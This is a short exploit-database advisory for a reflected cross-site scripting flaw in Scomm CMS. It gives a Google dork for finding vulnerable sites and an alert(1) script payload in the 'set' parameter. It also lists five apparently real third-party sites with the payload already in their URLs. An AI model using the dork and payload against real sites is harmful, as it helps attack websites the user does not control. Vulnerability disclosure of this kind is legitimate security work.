Scomm CMS (Сергей Комаров) Cross Site Scripting

2016.02.12
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

###################### # Exploit Title : Scomm CMS (Сергей Комаров) Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://scomm.ru # Google Dork : intext:"Автор сайта - Сергей Комаров, scomm@mail.ru" & inurl:php?set= # Date: 2016/02/12 # ###################### # PoC: # set=[XSS] # Payload = <script>alert(1);</script> # # http://kmgfx.ru/index.php?set=%3Cscript%3Ealert%281%29;%3C/script%3E # http://www.smartsnow.ru/laws/index.php?set=%3Cscript%3Ealert%281%29;%3C/script%3E # http://www.altex-group.ru/index.php?set=%3Cscript%3Ealert%281%29;%3C/script%3E # http://dombeat.ru/index.php?set=%3Cscript%3Ealert%281%29;%3C/script%3E # http://www.kalaws.ru/index.php?set=%3Cscript%3Ealert%281%29;%3C/script%3E # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Homepage : persian-team.ir ######################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top